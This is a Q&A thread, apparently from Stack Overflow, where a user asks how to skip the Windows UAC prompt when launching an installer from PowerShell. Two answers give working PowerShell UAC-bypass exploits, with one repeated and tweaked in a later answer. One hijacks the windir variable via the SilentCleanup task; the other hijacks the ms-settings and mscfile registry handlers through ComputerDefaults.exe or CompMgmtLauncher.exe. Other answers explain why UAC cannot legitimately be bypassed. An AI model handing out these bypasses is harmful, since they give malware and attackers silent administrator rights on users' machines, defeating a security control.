# UAC Getting in the Way of EXE Install Powershell

Tags: powershell

I'm attempting to install an EXE using Powershell with the following code `Start-Process -FilePath "C:\Windows\Temp\Installer.exe" -Verb runas` I'm getting the User Account Control pop up that says "Do you want to allow the following program to make changes to this computer?" I would rather not disable UAC. Are there any methods to programatically say "Yes" to the UAC prompt or to get around it?

Comment: Why not disable UAC, let it install, and then turn UAC back on? Depending on other settings you might even need to look `LowRiskFileTypes` to allow an exception to fully automate it.

Comment: It is definitely not recommended to disable UAC. Much better to do things the correct way.

Answer (score 2):

Disabling UAC edits a key in `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System`, and thus requires write access to `HKLM`. In other words, **disabling UAC requires admin rights**, which defeats the point of your question.

Windows has a [built-in AutoElevate backdoor](https://github.com/hfiref0x/UACME#uacme). You can use this to launch other executables.

1. An obvious approach is [Task Scheduler](https://superuser.com/a/197041/1142970). However, it's not the only approach.
2. Likewise, any windows executable that can [auto-elevate](https://www.researchgate.net/profile/Ernesto_Fernandez5/publication/319454675/figure/fig4/AS:534437358440449@1504431203272/List-of-auto-elevate-processes-in-Windows-10-after-executing-the-command-stringsexe-s.png) can be used to spawn a high integrity process without UAC.
3. This can be done programmatically below:

AlwaysNotify: (8.1 & after)

```
$regPath = "HKCU:\Environment"
$installer = "C:\Windows\Temp\Installer.exe" # change it yourself

Set-ItemProperty -Path $regPath -Name "windir" -Value "$installer && REM " -Force
schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Start-Sleep -s 5 # Depending on the machine, some extra time may be required
Remove-ItemProperty -Path $regPath -Name "windir" -Force
```

Default:

```
function Bypass-UAC{
    [CmdletBinding()]
    param([string]$key, [string]$exploit)
    $regPath = "HKCU:\Software\Classes\$key\shell\open\command"
    $installer = "C:\Windows\Temp\Installer.exe" # change it yourself

    New-Item $regPath -Force
    New-ItemProperty $regPath -Name "DelegateExecute" -Value $null -Force
    Set-ItemProperty $regPath -Name "(default)" -Value $installer -Force
    Start-Process $exploit
    Start-Sleep -s 5 # Depending on the machine, some extra time may be required
    Remove-Item $regPath -Force -Recurse
}

$ver = [System.Environment]::OSVersion.Version.Major #Get Windows Version

if ($ver -eq 10) {
    Bypass-UAC ms-settings ComputerDefaults.exe
} else {
    Bypass-UAC mscfile CompMgmtLauncher.exe
}
```

NeverNotify / Disabled:

```
Start-Process "C:\Windows\Temp\Installer.exe" -Verb runas
```

Comment: https://stackoverflow.com/q/66920815/38108 I'm struggling (PowerShell is quite new to me) …

Comment: @GrahamPerrin just change the value of `$installer` to the path of your `quickassist.exe`

Answer (score 0):

You are using runas, thus forcing a prompt to supply credentials in order to continue.

Sooo, there's that, or are you saying, wherever the script is being ran, the use is already logged on as admin? If that is the case, why elevate at all?

Thus ending up doing as Backin points out:

```
# Check UACState
(Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).EnableLUA
```

Though disabling UAC is not a recommended by MS and many others, though we know folks will anyway, for whatever reasoning they can justify it with.

Resources:

> [elevate without prompt - verb runas start-process](https://stackoverflow.com/questions/42581334/elevate-without-prompt-verb-runas-start-process)
>
> https://superuser.com/questions/195689/how-to-start-process-without-uac
>
> https://gallery.technet.microsoft.com/scriptcenter/How-to-easily-run-an-0c0eb47a

Answer (score 0):

The direct answer to your question:

> Are there any methods to programmatically say "Yes" to the UAC prompt or to get around it?

...is "no." The reason is that this would be a huge security hole. Imagine if this were possible: All malware would have to do is use this bypass technique.

UAC is specifically designed to *prevent* you from doing what you are asking. While it is *possible* to disable UAC, it is **definitely not recommended**.

Aaron Margosis (Microsoft) wrote a blog post about this a while back:

[FAQ: Why can't I bypass the UAC prompt?](https://techcommunity.microsoft.com/t5/windows-blog-archive/faq-why-can-8217-t-i-bypass-the-uac-prompt/ba-p/701510)

A quote from that blog:

> If it were possible to mark an application to run with silently-elevated privileges, what would become of all those apps out there with LUA [limited user access] bugs? Answer: they'd all be marked to silently elevate. How would future software for Windows be written? Answer: To silently elevate. Nobody would actually fix their apps, and end-user applications will continue to require and run with full administrative permissions unnecessarily.

Comment: [**HUGE** security hole indeed...](https://github.com/hfiref0x/UACME)

Comment: Yes, UAC can be abused, but it's important to note that, technically speaking, UAC is not a security boundary.

Answer (score 0):

I used [ps2exe](https://www.powershellgallery.com/packages/ps2exe/1.0.10) to generate my .exe from a .ps1 script. Using [HaxAddict1337](https://stackoverflow.com/users/12861751/haxaddict1337)'s Default code resulted in my .exe running but immediately closing.

I got it to work after adding a `Start-Sleep -s 10` right before the `Start-Process`:

```
#this is used to run an .exe as Administrator without the "Are you sure?" UAC prompt

function Bypass-UAC{
    [CmdletBinding()]
    param([string]$key, [string]$exploit)
    $regPath = "HKCU:\Software\Classes\$key\shell\open\command"
    $installer = "C:\Windows\Temp\myProgram.exe" # change it yourself

    New-Item $regPath -Force
    New-ItemProperty $regPath -Name "DelegateExecute" -Value $null -Force
    Set-ItemProperty $regPath -Name "(default)" -Value $installer -Force
    Start-Sleep -s 10 #if it's not working, try increasing these values
    Start-Process $exploit
    Start-Sleep -s 5 #if it's not working, try increasing these values
    Remove-Item $regPath -Force -Recurse
}

$ver = [System.Environment]::OSVersion.Version.Major #Get Windows Version

if ($ver -eq 10) {
    Bypass-UAC ms-settings ComputerDefaults.exe
} else {
    Bypass-UAC mscfile CompMgmtLauncher.exe
}
```

Answer (score -1):

just write this command to bypass UAC but I don't know how to give permission to say yes in bat script
"powershell Start-Process cmd -Verb runAs"

Comment: As it’s currently written, your answer is unclear. Please [edit] to add additional details that will help others understand how this addresses the question asked. You can find more information on how to write good answers [in the help center](/help/how-to-answer).